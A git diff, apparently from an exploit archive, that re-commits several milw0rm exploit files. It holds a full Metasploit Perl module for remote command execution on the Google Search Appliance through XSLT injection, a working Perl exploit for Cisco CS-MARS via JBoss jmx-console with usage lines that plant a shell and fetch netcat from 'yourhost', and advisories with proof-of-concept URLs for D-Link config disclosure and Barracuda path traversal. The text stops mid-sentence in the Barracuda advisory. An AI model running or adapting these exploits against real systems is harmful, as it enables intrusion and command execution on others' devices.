Google Search Appliance. This feature allows for arbitrary - java methods to be called. Google released a patch and advisory to - their client base in August of 2005 (GA-2005-08-m). The target appliance - must be able to connect back to your machine for this exploit to work. - }), - - 'Arch' => [ ], - 'OS' => [ ], - 'Priv' => 0, - 'UserOpts' => - { - 'RHOST' => [ 1, 'HOST', 'The address of the Google appliance'], - 'RPORT' => [ 1, 'PORT', 'The port used by the search interface', 80], - 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], - 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], - 'HTTPADDR' => [ 0, 'HOST', 'The address that can be used to connect back to this system'], - }, - 'Payload' => - { - 'Space' => 1024, - 'Keys' => [ 'cmd' ], - }, - 'Refs' => - [ - ['OSVDB', 20981], - ], - 'DefaultTarget' => 0, - 'Targets' => - [ - [ 'Google Search Appliance'] - ], - 'Keys' => [ 'google' ], - - 'DisclosureDate' => 'Aug 16 2005', -}; - -sub new -{ - my $class = shift; - my $self; - - $self = $class->SUPER::new( - { - 'Info' => $info, - 'Advanced' => $advanced, - }, - @_); - - return $self; -} - -sub Check { - my $self = shift; - my $s = $self->ConnectSearch; - - if (! $s) { - return $self->CheckCode('Connect'); - } - - my $url = - "/search?client=". Pex::Text::AlphaNumText(int(rand(15))+1). "&". - "site=".Pex::Text::AlphaNumText(int(rand(15))+1)."&". - "output=xml_no_dtd&". - "q=".Pex::Text::AlphaNumText(int(rand(15))+1)."&". - "proxystylesheet=http://".Pex::Text::AlphaNumText(int(rand(32))+1)."/"; - - $s->Send("GET $url HTTP/1.0\r\n\r\n"); - my $page = $s->Recv(-1, 5); - $s->Close; - - if ($page =~ /cannot be resolved to an ip address/) { - $self->PrintLine("[*] This system appears to be vulnerable >:-)"); - return $self->CheckCode('Confirmed'); - } - - if ($page =~ /ERROR: Unable to fetch the stylesheet/) { - $self->PrintLine("[*] This system appears to be patched"); - } - - $self->PrintLine("[*] This system does not appear to be vulnerable"); - return $self->CheckCode('Safe'); -} - - -sub Exploit -{ - my $self = shift; - my ($s, $page); - - # Request the index page to obtain a redirect response - $s = $self->ConnectSearch || return; - $s->Send("GET / HTTP/1.0\r\n\r\n"); - $page = $s->Recv(-1, 5); - $s->Close; - - # Parse the redirect to get the client and site values - my ($goog_site, $goog_clnt) = $page =~ m/^location.*site=([^\&]+)\&.*client=([^\&]+)\&/im; - if (! $goog_site || ! $goog_clnt) { - $self->PrintLine("[*] Invalid response to our request, is this a Google appliance?"); - #$self->PrintLine($page); - #!!! return; - $goog_site = 'test'; - $goog_clnt = 'test'; - } - - # Create the listening local socket that will act as our HTTP server - my $lis = IO::Socket::INET->new( - LocalHost => $self->GetVar('HTTPHOST'), - LocalPort => $self->GetVar('HTTPPORT'), - ReuseAddr => 1, - Listen => 1, - Proto => 'tcp'); - - if (not defined($lis)) { - $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); - return; - } - my $sel = IO::Select->new($lis); - - # Send a search request with our own address in the proxystylesheet parameter - my $query = Pex::Text::AlphaNumText(int(rand(32))+1); - - my $proxy = - "http://". - ($self->GetVar('HTTPADDR') || Pex::Utils::SourceIP($self->GetVar('RHOST'))). - ":".$self->GetVar('HTTPPORT')."/".Pex::Text::AlphaNumText(int(rand(15))+1).".xsl"; - - my $url = - "/search?client=". $goog_clnt ."&site=". $goog_site . - "&output=xml_no_dtd&proxystylesheet=". $proxy . - "&q=". $query ."&proxyreload=1"; - - $self->PrintLine("[*] Sending our malicious search request..."); - $s = $self->ConnectSearch || return; - $s->Send("GET $url HTTP/1.0\r\n\r\n"); - $page = $s->Recv(-1, 3); - $s->Close; - - $self->PrintLine("[*] Listening for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . " ..."); - - # Did we receive a connection? - my @r = $sel->can_read(30); - - if (! @r) { - $self->PrintLine("[*] No connection received from the search engine, possibly patched."); - $lis->close; - return; - } - - my $c = $lis->accept(); - if (! $c) { - $self->PrintLine("[*] No connection received from the search engine, possibly patched."); - $lis->close; - return; - } - - my $cli = Msf::Socket::Tcp->new_from_socket($c); - $self->PrintLine("[*] Connection received from ".$cli->PeerAddr."..."); - $self->ProcessHTTP($cli); - return; -} - -sub ConnectSearch { - my $self = shift; - my $s = Msf::Socket::Tcp->new( - 'PeerAddr' => $self->GetVar('RHOST'), - 'PeerPort' => $self->GetVar('RPORT'), - 'SSL' => $self->GetVar('SSL') - ); - - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - return $s; -} - -sub ProcessHTTP -{ - my $self = shift; - my $cli = shift; - my $targetIdx = $self->GetVar('TARGET'); - my $target = $self->Targets->[$targetIdx]; - my $ret = $target->[1]; - my $shellcode = $self->GetVar('EncodedPayload')->Payload; - my $content; - my $rhost; - my $rport; - - # Read the first line of the HTTP request - my ($cmd, $url, $proto) = split(/ /, $cli->RecvLine(10)); - - # The way we call Runtime.getRuntime().exec, Java will split - # our string on whitespace. Since we are injecting via XSLT, - # inserting quotes becomes a huge pain, so we do this... - my $exec_str = - '/usr/bin/perl -e system(pack(qq{H*},qq{' . - unpack("H*", $self->GetVar('EncodedPayload')->RawPayload). - '}))'; - - # Load the template from our data section, we have to manually - # seek and reposition to allow the exploit to be used more - # than once without a reload. - seek(DATA, 0, 0); - while() { last if /^__DATA__$/ } - while() { $content .= $_ } - - # Insert our command line - $content =~ s/:x:MSF:x:/$exec_str/; - - # Send it to the requesting appliance - $rport = $cli->PeerPort; - $rhost = $cli->PeerAddr; - $self->PrintLine("[*] HTTP Client connected from $rhost, sending XSLT..."); - - my $res = "HTTP/1.1 200 OK\r\n" . - "Content-Type: text/html\r\n" . - "Content-Length: " . length($content) . "\r\n" . - "Connection: close\r\n" . - "\r\n" . - $content; - - $self->PrintLine("[*] Sending ".length($res)." bytes..."); - $cli->Send($res); - $cli->Close; -} - -1; - -# milw0rm.com [2005-11-20] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. +## + +package Msf::Exploit::google_proxystylesheet_exec; + +use strict; +use base "Msf::Exploit"; +use Pex::Text; +use IO::Socket; +use IO::Select; +my $advanced = { }; + +my $info = +{ + 'Name' => 'Google Appliance ProxyStyleSheet Command Execution', + 'Version' => '$Revision: 1.1 $', + 'Authors' => [ 'H D Moore ' ], + + 'Description' => + Pex::Text::Freeform(qq{ + This module exploits a feature in the Saxon XSLT parser used by + the Google Search Appliance. This feature allows for arbitrary + java methods to be called. Google released a patch and advisory to + their client base in August of 2005 (GA-2005-08-m). The target appliance + must be able to connect back to your machine for this exploit to work. + }), + + 'Arch' => [ ], + 'OS' => [ ], + 'Priv' => 0, + 'UserOpts' => + { + 'RHOST' => [ 1, 'HOST', 'The address of the Google appliance'], + 'RPORT' => [ 1, 'PORT', 'The port used by the search interface', 80], + 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], + 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], + 'HTTPADDR' => [ 0, 'HOST', 'The address that can be used to connect back to this system'], + }, + 'Payload' => + { + 'Space' => 1024, + 'Keys' => [ 'cmd' ], + }, + 'Refs' => + [ + ['OSVDB', 20981], + ], + 'DefaultTarget' => 0, + 'Targets' => + [ + [ 'Google Search Appliance'] + ], + 'Keys' => [ 'google' ], + + 'DisclosureDate' => 'Aug 16 2005', +}; + +sub new +{ + my $class = shift; + my $self; + + $self = $class->SUPER::new( + { + 'Info' => $info, + 'Advanced' => $advanced, + }, + @_); + + return $self; +} + +sub Check { + my $self = shift; + my $s = $self->ConnectSearch; + + if (! $s) { + return $self->CheckCode('Connect'); + } + + my $url = + "/search?client=". Pex::Text::AlphaNumText(int(rand(15))+1). "&". + "site=".Pex::Text::AlphaNumText(int(rand(15))+1)."&". + "output=xml_no_dtd&". + "q=".Pex::Text::AlphaNumText(int(rand(15))+1)."&". + "proxystylesheet=http://".Pex::Text::AlphaNumText(int(rand(32))+1)."/"; + + $s->Send("GET $url HTTP/1.0\r\n\r\n"); + my $page = $s->Recv(-1, 5); + $s->Close; + + if ($page =~ /cannot be resolved to an ip address/) { + $self->PrintLine("[*] This system appears to be vulnerable >:-)"); + return $self->CheckCode('Confirmed'); + } + + if ($page =~ /ERROR: Unable to fetch the stylesheet/) { + $self->PrintLine("[*] This system appears to be patched"); + } + + $self->PrintLine("[*] This system does not appear to be vulnerable"); + return $self->CheckCode('Safe'); +} + + +sub Exploit +{ + my $self = shift; + my ($s, $page); + + # Request the index page to obtain a redirect response + $s = $self->ConnectSearch || return; + $s->Send("GET / HTTP/1.0\r\n\r\n"); + $page = $s->Recv(-1, 5); + $s->Close; + + # Parse the redirect to get the client and site values + my ($goog_site, $goog_clnt) = $page =~ m/^location.*site=([^\&]+)\&.*client=([^\&]+)\&/im; + if (! $goog_site || ! $goog_clnt) { + $self->PrintLine("[*] Invalid response to our request, is this a Google appliance?"); + #$self->PrintLine($page); + #!!! return; + $goog_site = 'test'; + $goog_clnt = 'test'; + } + + # Create the listening local socket that will act as our HTTP server + my $lis = IO::Socket::INET->new( + LocalHost => $self->GetVar('HTTPHOST'), + LocalPort => $self->GetVar('HTTPPORT'), + ReuseAddr => 1, + Listen => 1, + Proto => 'tcp'); + + if (not defined($lis)) { + $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); + return; + } + my $sel = IO::Select->new($lis); + + # Send a search request with our own address in the proxystylesheet parameter + my $query = Pex::Text::AlphaNumText(int(rand(32))+1); + + my $proxy = + "http://". + ($self->GetVar('HTTPADDR') || Pex::Utils::SourceIP($self->GetVar('RHOST'))). + ":".$self->GetVar('HTTPPORT')."/".Pex::Text::AlphaNumText(int(rand(15))+1).".xsl"; + + my $url = + "/search?client=". $goog_clnt ."&site=". $goog_site . + "&output=xml_no_dtd&proxystylesheet=". $proxy . + "&q=". $query ."&proxyreload=1"; + + $self->PrintLine("[*] Sending our malicious search request..."); + $s = $self->ConnectSearch || return; + $s->Send("GET $url HTTP/1.0\r\n\r\n"); + $page = $s->Recv(-1, 3); + $s->Close; + + $self->PrintLine("[*] Listening for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . " ..."); + + # Did we receive a connection? + my @r = $sel->can_read(30); + + if (! @r) { + $self->PrintLine("[*] No connection received from the search engine, possibly patched."); + $lis->close; + return; + } + + my $c = $lis->accept(); + if (! $c) { + $self->PrintLine("[*] No connection received from the search engine, possibly patched."); + $lis->close; + return; + } + + my $cli = Msf::Socket::Tcp->new_from_socket($c); + $self->PrintLine("[*] Connection received from ".$cli->PeerAddr."..."); + $self->ProcessHTTP($cli); + return; +} + +sub ConnectSearch { + my $self = shift; + my $s = Msf::Socket::Tcp->new( + 'PeerAddr' => $self->GetVar('RHOST'), + 'PeerPort' => $self->GetVar('RPORT'), + 'SSL' => $self->GetVar('SSL') + ); + + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return; + } + return $s; +} + +sub ProcessHTTP +{ + my $self = shift; + my $cli = shift; + my $targetIdx = $self->GetVar('TARGET'); + my $target = $self->Targets->[$targetIdx]; + my $ret = $target->[1]; + my $shellcode = $self->GetVar('EncodedPayload')->Payload; + my $content; + my $rhost; + my $rport; + + # Read the first line of the HTTP request + my ($cmd, $url, $proto) = split(/ /, $cli->RecvLine(10)); + + # The way we call Runtime.getRuntime().exec, Java will split + # our string on whitespace. Since we are injecting via XSLT, + # inserting quotes becomes a huge pain, so we do this... + my $exec_str = + '/usr/bin/perl -e system(pack(qq{H*},qq{' . + unpack("H*", $self->GetVar('EncodedPayload')->RawPayload). + '}))'; + + # Load the template from our data section, we have to manually + # seek and reposition to allow the exploit to be used more + # than once without a reload. + seek(DATA, 0, 0); + while() { last if /^__DATA__$/ } + while() { $content .= $_ } + + # Insert our command line + $content =~ s/:x:MSF:x:/$exec_str/; + + # Send it to the requesting appliance + $rport = $cli->PeerPort; + $rhost = $cli->PeerAddr; + $self->PrintLine("[*] HTTP Client connected from $rhost, sending XSLT..."); + + my $res = "HTTP/1.1 200 OK\r\n" . + "Content-Type: text/html\r\n" . + "Content-Length: " . length($content) . "\r\n" . + "Connection: close\r\n" . + "\r\n" . + $content; + + $self->PrintLine("[*] Sending ".length($res)." bytes..."); + $cli->Send($res); + $cli->Close; +} + +1; + +# milw0rm.com [2005-11-20] diff --git a/platforms/hardware/remote/169.pl b/platforms/hardware/remote/169.pl index 3b81493f0..e287e6085 100755 --- a/platforms/hardware/remote/169.pl +++ b/platforms/hardware/remote/169.pl @@ -410,6 +410,6 @@ sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Servic print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); exit(1); } - - -# milw0rm.com [2004-03-28] + + +# milw0rm.com [2004-03-28] diff --git a/platforms/hardware/remote/1889.txt b/platforms/hardware/remote/1889.txt index 893eb5377..9dfdf320e 100755 --- a/platforms/hardware/remote/1889.txt +++ b/platforms/hardware/remote/1889.txt @@ -1,34 +1,34 @@ -# ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap) -# INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY -# http://www.intruders.com.br/ , http://www.intruders.org.br/ - -Making a HTTP request to the /cgi-bin/ directory, the Web server will return error 404 (Page not found). -Making a HTTP request to the /cgi-bin/AnyFile.htm, the Web server will return error 404 (Page not found). -However, making a HTTP request to any file in /cgi-bin/ directory, with .cfg extension, will return all the device configuration. - -For example, making the following request: - -http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg -We would have a result equivalent to the following: - -# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved -# DO NOT EDIT -- This configuration file is automatically generated -magic Ar52xxAP -fwc: 34 -login admin -DHCPServer -Eth_Acl -nameaddr -domainsuffix -IP_Addr 10.0.0.30 -IP_Mask 255.0.0.0 -Gateway_Addr 10.0.0.1 -RADIUSaddr -RADIUSport 1812 -RADIUSsecret -password IntrudersTest -passphrase -wlan1 passphrase AnewBadPassPhrase -# Several lines removed. - -# milw0rm.com [2006-06-08] +# ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap) +# INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY +# http://www.intruders.com.br/ , http://www.intruders.org.br/ + +Making a HTTP request to the /cgi-bin/ directory, the Web server will return error 404 (Page not found). +Making a HTTP request to the /cgi-bin/AnyFile.htm, the Web server will return error 404 (Page not found). +However, making a HTTP request to any file in /cgi-bin/ directory, with .cfg extension, will return all the device configuration. + +For example, making the following request: + +http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg +We would have a result equivalent to the following: + +# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved +# DO NOT EDIT -- This configuration file is automatically generated +magic Ar52xxAP +fwc: 34 +login admin +DHCPServer +Eth_Acl +nameaddr +domainsuffix +IP_Addr 10.0.0.30 +IP_Mask 255.0.0.0 +Gateway_Addr 10.0.0.1 +RADIUSaddr +RADIUSport 1812 +RADIUSsecret +password IntrudersTest +passphrase +wlan1 passphrase AnewBadPassPhrase +# Several lines removed. + +# milw0rm.com [2006-06-08] diff --git a/platforms/hardware/remote/2048.pl b/platforms/hardware/remote/2048.pl index b4ebbbb3d..b147c4368 100755 --- a/platforms/hardware/remote/2048.pl +++ b/platforms/hardware/remote/2048.pl @@ -1,194 +1,194 @@ -#!/usr/bin/perl -# -# Cisco/Protego CS-MARS < 4.2.1 remote command execution, system compromise -# via insecure JBoss installation. -# -# Fully functional POC code by Jon Hart -# -# Addressed in CSCse47646 -# -# CS-MARS is an event correlation product orginally written by Protego, -# which is now owned by Cisco. It is built on top of JBoss. -# Unfortunately, little or no effort was put in to securing the JBoss -# installation as per the JBoss community's recommended best practices. -# A such, the usual set of JBoss interfaces are wide open and it is up to -# the attacker how creative they want to be in compromising the box. This -# particular exploit vector abuses the JBoss jmx-console for all sorts of -# fun. It should also be noted that, because of the very old kernel -# running on most CS-MARS boxes (2.4.9), once JBoss is compromised, root is -# almost trivial. Thanks to Cisco PSIRT and Matt Cerha for their -# cooperation in getting this fixed. -# -################################# -# Copyright (C) 2006 Jon Hart -# -# This program is free software; you can redistribute it and/or modify it -# under the terms of the GNU General Public License as published by the Free -# Software Foundation; either version 2 of the License, or (at your option) -# any later version. -# -# This program is distributed in the hope that it will be useful, but WITHOUT -# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or -# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for -# more details. -# -# You should have received a copy of the GNU General Public License along with -# this program; if not, write to the Free Software Foundation, Inc., 59 Temple -# Place, Suite 330, Boston, MA 02111-1307 USA -# -# -################################# -# - -use strict; -use HTTP::Request::Common; -use LWP::UserAgent; -use IO::Socket; - -my $target = shift(@ARGV) || &usage; -my $attack_type = shift(@ARGV) || &usage; - -for ($attack_type) { - if (/pass/) { &change_passwd(@ARGV); } - elsif (/cmd/) { &run_cmd(@ARGV); } - elsif (/upload/) { &upload(@ARGV); } - elsif (/[bean|bsh]/) { &run_bsh(@ARGV); } - else { &usage; } -} - -sub change_passwd { - my $passwd = shift; - &run_cmd("/opt/janus/release/bin/pnpasswd $passwd"); -} - -sub encode { - my $en = shift; - my $string = ""; - foreach my $char (split(//, $en)) { - if ($char =~ /([:|\/|(|)|"|'|`| ])/) { - $string .= sprintf("%%%x", ord($1)); - } else { $string .= $char; } - } - return $string; -} - -sub jmx_post { - my $form_data = shift; - my $ua = LWP::UserAgent->new; - $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"); - my $req = HTTP::Request->new(POST => "http://$target/jmx-console/HtmlAdaptor"); - $req->content_type('application/x-www-form-urlencoded'); - $req->content(&encode($form_data)); - - my $res = $ua->request($req); - - return $res->is_success ? 0 : $res->status_line; -} - -sub run_bsh { - my $file = shift; - my $bsh = ""; - open(BSH, "$file") or die "Couldn't open $file: $!\n"; - print("Sending beanshell from $file: "); - while () { - # the bsh must be one long string... - chomp(); - $bsh .= $_; - } - - printf("%s\n", &send_beanshell($bsh) == 0 ? "Success" : "Failed"); -} - -sub run_cmd { - my $cmd = shift; - my $code = ""; - - # & in the command needs to be encoded so as to not be confused with the & - # in the URI - $cmd =~ s/&/%26/g; - if ($cmd =~ />|\||&/) { - # exec() does not handle pipes or redirection well, so do this instead - $code = 'String sh = "/bin/sh"; String opt = "-c"; String cmd = "' - . $cmd . - '"; String[] exec = new String[] { sh, opt, cmd }; Runtime.getRuntime().exec(exec);'; - } else { - $code = "Runtime.getRuntime().exec(\"$cmd\");"; - } - - print("Running '$cmd' on $target: "); - printf("%s\n", &send_beanshell($code) == 0 ? "Success" : "Failed!"); -} - -sub send_beanshell { - my $code = shift; - # ensure the name of the bsh job within java has a unique name - my $name = "cmd" . int(rand(65535)) . $$; - return &jmx_post("action=invokeOp&name=jboss.scripts:service=BSHDeployer&methodIndex=1&arg0=$code&arg1=$name"); -} - -sub upload { - # upload a file. I was too lazy to use org.jboss.console.manager.DeploymentFileRepository - my $file = shift; - my $path = shift; - my $new_name = shift; - my $chunk = ""; - my $ret = 0; - open(FILE, "< $file") or die "Couldn't open $file for reading: $!\n"; - - if (!(defined($new_name))) { - my @path = split(/\//, $file); - $new_name = $path[$#path]; - } - - print("Uploading $file to $target...\n"); - &run_cmd("touch $path/$new_name"); - while(read(FILE,$chunk,4096)) { - # encode this file in 4096 byte chunks in a format that is able to be handled by JBoss. - # There are plenty of ways to do this, but none that were both portable and that didn't make JBoss - # throw a 500 or otherwise botch the file. UGLY. - $chunk = join('', map { sprintf("%03d,", ord("$_")) } split(//, $chunk)); - $ret += &run_cmd("echo -n $chunk | perl -ne 'foreach (split(/,/, \$_)) { print chr(\$_); }' >> $path/$new_name"); - } - - printf("Upload of $file to $target:$path/new_name %s!\n", $ret == 0 ? "succeeded" : "failed"); -} - - -sub usage { - print < - - Basic Usage: - $0 [ pass - Run shell command: - $0 cmd - Run BeanShell code: - $0 bsh /path/to/file/with/beanshell - Upload files: - $0 upload [] - - Fun Stuff: - Get a real shell: - $0 cmd "cp /opt/janus/release/bin/pnsh /opt/janus/release/bin/pnsh.bak" - $0 cmd "rm /opt/janus/release/bin/pnsh" - $0 cmd "cp /bin/sh /opt/janus/release/bin/pnsh" - # now ssh to the target... - [pnadmin\@pnmars bin]\$ id - uid=501(pnadmin) gid=501(pnadmin) groups=501(pnadmin) - [pnadmin\@pnmars bin]\$ uname -a - Linux pnmars 2.4.9-e.57 #1 Thu Dec 2 20:56:19 EST 2004 i686 unknown - [pnadmin\@pnmars bin]\$ hostname - pnmars - - Download something: - $0 cmd "curl http://yourhost/nc -o /tmp/nc" - -EOF -exit(1); -} - -# milw0rm.com [2006-07-20] +#!/usr/bin/perl +# +# Cisco/Protego CS-MARS < 4.2.1 remote command execution, system compromise +# via insecure JBoss installation. +# +# Fully functional POC code by Jon Hart +# +# Addressed in CSCse47646 +# +# CS-MARS is an event correlation product orginally written by Protego, +# which is now owned by Cisco. It is built on top of JBoss. +# Unfortunately, little or no effort was put in to securing the JBoss +# installation as per the JBoss community's recommended best practices. +# A such, the usual set of JBoss interfaces are wide open and it is up to +# the attacker how creative they want to be in compromising the box. This +# particular exploit vector abuses the JBoss jmx-console for all sorts of +# fun. It should also be noted that, because of the very old kernel +# running on most CS-MARS boxes (2.4.9), once JBoss is compromised, root is +# almost trivial. Thanks to Cisco PSIRT and Matt Cerha for their +# cooperation in getting this fixed. +# +################################# +# Copyright (C) 2006 Jon Hart +# +# This program is free software; you can redistribute it and/or modify it +# under the terms of the GNU General Public License as published by the Free +# Software Foundation; either version 2 of the License, or (at your option) +# any later version. +# +# This program is distributed in the hope that it will be useful, but WITHOUT +# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or +# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for +# more details. +# +# You should have received a copy of the GNU General Public License along with +# this program; if not, write to the Free Software Foundation, Inc., 59 Temple +# Place, Suite 330, Boston, MA 02111-1307 USA +# +# +################################# +# + +use strict; +use HTTP::Request::Common; +use LWP::UserAgent; +use IO::Socket; + +my $target = shift(@ARGV) || &usage; +my $attack_type = shift(@ARGV) || &usage; + +for ($attack_type) { + if (/pass/) { &change_passwd(@ARGV); } + elsif (/cmd/) { &run_cmd(@ARGV); } + elsif (/upload/) { &upload(@ARGV); } + elsif (/[bean|bsh]/) { &run_bsh(@ARGV); } + else { &usage; } +} + +sub change_passwd { + my $passwd = shift; + &run_cmd("/opt/janus/release/bin/pnpasswd $passwd"); +} + +sub encode { + my $en = shift; + my $string = ""; + foreach my $char (split(//, $en)) { + if ($char =~ /([:|\/|(|)|"|'|`| ])/) { + $string .= sprintf("%%%x", ord($1)); + } else { $string .= $char; } + } + return $string; +} + +sub jmx_post { + my $form_data = shift; + my $ua = LWP::UserAgent->new; + $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"); + my $req = HTTP::Request->new(POST => "http://$target/jmx-console/HtmlAdaptor"); + $req->content_type('application/x-www-form-urlencoded'); + $req->content(&encode($form_data)); + + my $res = $ua->request($req); + + return $res->is_success ? 0 : $res->status_line; +} + +sub run_bsh { + my $file = shift; + my $bsh = ""; + open(BSH, "$file") or die "Couldn't open $file: $!\n"; + print("Sending beanshell from $file: "); + while () { + # the bsh must be one long string... + chomp(); + $bsh .= $_; + } + + printf("%s\n", &send_beanshell($bsh) == 0 ? "Success" : "Failed"); +} + +sub run_cmd { + my $cmd = shift; + my $code = ""; + + # & in the command needs to be encoded so as to not be confused with the & + # in the URI + $cmd =~ s/&/%26/g; + if ($cmd =~ />|\||&/) { + # exec() does not handle pipes or redirection well, so do this instead + $code = 'String sh = "/bin/sh"; String opt = "-c"; String cmd = "' + . $cmd . + '"; String[] exec = new String[] { sh, opt, cmd }; Runtime.getRuntime().exec(exec);'; + } else { + $code = "Runtime.getRuntime().exec(\"$cmd\");"; + } + + print("Running '$cmd' on $target: "); + printf("%s\n", &send_beanshell($code) == 0 ? "Success" : "Failed!"); +} + +sub send_beanshell { + my $code = shift; + # ensure the name of the bsh job within java has a unique name + my $name = "cmd" . int(rand(65535)) . $$; + return &jmx_post("action=invokeOp&name=jboss.scripts:service=BSHDeployer&methodIndex=1&arg0=$code&arg1=$name"); +} + +sub upload { + # upload a file. I was too lazy to use org.jboss.console.manager.DeploymentFileRepository + my $file = shift; + my $path = shift; + my $new_name = shift; + my $chunk = ""; + my $ret = 0; + open(FILE, "< $file") or die "Couldn't open $file for reading: $!\n"; + + if (!(defined($new_name))) { + my @path = split(/\//, $file); + $new_name = $path[$#path]; + } + + print("Uploading $file to $target...\n"); + &run_cmd("touch $path/$new_name"); + while(read(FILE,$chunk,4096)) { + # encode this file in 4096 byte chunks in a format that is able to be handled by JBoss. + # There are plenty of ways to do this, but none that were both portable and that didn't make JBoss + # throw a 500 or otherwise botch the file. UGLY. + $chunk = join('', map { sprintf("%03d,", ord("$_")) } split(//, $chunk)); + $ret += &run_cmd("echo -n $chunk | perl -ne 'foreach (split(/,/, \$_)) { print chr(\$_); }' >> $path/$new_name"); + } + + printf("Upload of $file to $target:$path/new_name %s!\n", $ret == 0 ? "succeeded" : "failed"); +} + + +sub usage { + print < + + Basic Usage: + $0 [ pass + Run shell command: + $0 cmd + Run BeanShell code: + $0 bsh /path/to/file/with/beanshell + Upload files: + $0 upload [] + + Fun Stuff: + Get a real shell: + $0 cmd "cp /opt/janus/release/bin/pnsh /opt/janus/release/bin/pnsh.bak" + $0 cmd "rm /opt/janus/release/bin/pnsh" + $0 cmd "cp /bin/sh /opt/janus/release/bin/pnsh" + # now ssh to the target... + [pnadmin\@pnmars bin]\$ id + uid=501(pnadmin) gid=501(pnadmin) groups=501(pnadmin) + [pnadmin\@pnmars bin]\$ uname -a + Linux pnmars 2.4.9-e.57 #1 Thu Dec 2 20:56:19 EST 2004 i686 unknown + [pnadmin\@pnmars bin]\$ hostname + pnmars + + Download something: + $0 cmd "curl http://yourhost/nc -o /tmp/nc" + +EOF +exit(1); +} + +# milw0rm.com [2006-07-20] diff --git a/platforms/hardware/remote/2136.txt b/platforms/hardware/remote/2136.txt index 0cc623a6b..bd80e29cc 100755 --- a/platforms/hardware/remote/2136.txt +++ b/platforms/hardware/remote/2136.txt @@ -1,57 +1,57 @@ -Title: Barracuda Arbitrary File Disclosure + Command Execution -Severity: High (Sensitive Information Disclosure) -Date: 01 August 2006 -Version Affected: Barracuda Spam Firewall version 3.3.01.001 to 3.3.03.053 -Discovered by: Greg Sinclair (gssincla@nnlsoftware.com) - -Discovered on: 29 May 2006 - -Overview: -Barracuda Spam Firewalls (www.barracudanetworks.com) are vulnerable to -arbitrary file disclosure due to improper parameter sanitation. - - -Details: -The Barracuda Spam Firewalls from version 3.3.01.001 to 3.3.02.053 are vulnerable to -arbitrary file disclosure via the preview_email.cgi script. The /cgi- -bin/preview_email.cgi script is designed to retrieve a message from the local -message database on the Barracuda Spam Firewall. However, the "file" parameter which -is passed via GET is not properly sanitized to restrict the file retrieval to the -message database directories. The script looks for "/mail/mlog" in the file -parameter but does not take into account directory transversal arguments such as -".." The result is that any file that is accessible to the web server user is -accessible from the web interface. The script does require a valid user to be logged -in to perform this attack, however using the "Barracuda Hardcoded Password -Vulnerability" (NNL-20060801-01) guest password vulnerability this restriction can -easily be overcome. This particular problem is amplified by the fact that it is -possible to download the full configuration file for the barracuda. The -configuration file is periodically backed-up into the /tmp directory as -"/tmp/backup/periodic_config.txt.tmp" Message confidentiality is compromised by the -fact that an attacker who is able to view the message log screen (which can be done -via the guest password vulnerability) can easily view any message on the system. -The message logs are stored as /mail/mlog/X/Y/email_address/msgID where X is the -first character of email_address, Y is the second character of email_address, -email_address is the recipient's email address and msgID is the message ID assigned -to the message in question. So for example if jon@smith.com received a message with -messageID 1234, any user could view the message by entering -/mail/mlog/j/o/jon@smith.com/1234 - -Proof of Concept: - -https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp - -Command Execution by Matthew Hall - -https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/| - -Recommendations: -* Never allow your barracuda web interface to be accessible from untrusted networks (especially the Internet) -* Upgrade to version 3.3.0.54 or later - -Vendor Contact: -30 May 2006 - Initial Vendor Contact -24 June 2006 - Vendor replies with prospect of fix -17 July 2006 - NNL request status update, no reply -01 Aug 2006 - NNL releases vuln report, notifies vendor of release - -# milw0rm.com [2006-08-07] +Title: Barracuda Arbitrary File Disclosure + Command Execution +Severity: High (Sensitive Information Disclosure) +Date: 01 August 2006 +Version Affected: Barracuda Spam Firewall version 3.3.01.001 to 3.3.03.053 +Discovered by: Greg Sinclair (gssincla@nnlsoftware.com) + +Discovered on: 29 May 2006 + +Overview: +Barracuda Spam Firewalls (www.barracudanetworks.com) are vulnerable to +arbitrary file disclosure due to improper parameter sanitation. + + +Details: +The Barracuda Spam Firewalls from version 3.3.01.001 to 3.3.02.053 are vulnerable to +arbitrary file disclosure via the preview_email.cgi script. The /cgi- +bin/preview_email.cgi script is designed to retrieve a message from the local +message database on the Barracuda Spam Firewall. However, the "file" parameter which +is passed via GET is not properly sanitized to restrict the file retrieval to the +message database directories. The script looks for "/mail/mlog" in the file +parameter but does not take into account directory transversal arguments such as +".." The result is that any file that is accessible to the web server user is +accessible from the web interface. The script does require a valid user to be logged +in to perform this attack, however using the "Barracuda Hardcoded Password +Vulnerability" (NNL-20060801-01) guest password vulnerability this restriction can +easily be overcome. This particular problem is amplified by the fact 